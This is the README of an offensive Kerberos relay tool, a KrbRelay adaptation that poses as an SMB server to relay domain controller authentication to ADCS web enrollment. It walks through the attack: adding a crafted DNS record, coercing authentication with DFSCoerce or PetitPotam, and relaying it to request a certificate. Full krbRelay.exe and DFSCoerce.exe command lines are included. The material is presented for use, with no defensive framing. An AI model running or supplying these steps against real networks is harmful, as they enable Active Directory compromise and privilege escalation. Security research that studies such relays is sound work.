This krbrelay version acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP.
It's 90% based on @cube0x0's KrbRelay: https://github.com/cube0x0/KrbRelay
To control the SPN for relaying, James Forshaw's CredMarshalTargetInfo() trick is required: https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html
Create a DNS entry for the target server_name you want to relay the kerberos AP-REQ as: <server_name>1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA and mapped to your listener/relay IP.
Domain users can typically perform secure DNS updates, for example you can use powershell script invoke-dnsupdate (https://github.com/Kevin-Robertson/Powermad) for adding a DNS entry
Trigger the SMB authentication with a third-party tool, for example DFSCoerce https://github.com/Wh04m1001/DFSCoerce, PetitPotam https://github.com/topotam/PetitPotam , etc... and relay it to the attacker machine.
Given that SMB port is 445 you have two options on the Windows attacker machine:
- use a Linux box acting as redirector
- disable the SERVER serice on your Windows machine -> you can use the smb_control.bat to perform these tasks.
This is a quick & dirty adaptation from original project, leaving cleanup and optimization to you ;)
# Relay the DC SMB authentication to HTTP (ADCS) web enrollment and request client certificate using a linux box redirecting to windows attacker machine on port 9999:<br>
krbRelay.exe -spn http/adcs-mylab.mylab.local -redirecthost adcs-mylab1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -endpoint certsrv -adcs DomainController -listenerport 9999<br>
#In another window:
DFSCoerce.exe -l adcs-mylab1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -t DC-2
(https://github.com/decoder-it/DFSCoerce-exe-2)
# special command line switches:
-listenerport: relay listener port
-redirecthost: relay server/redirector mapped to the sepcial DNS entry <server_name>1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA
-relayeduser, -relayeduserdomain : optional use to specify user/machine and domain, useful in certain cases (don't know exactly why) when certificate creation fails because of empty CN
For detailed usage and command line switches refer to original krbrelay tool
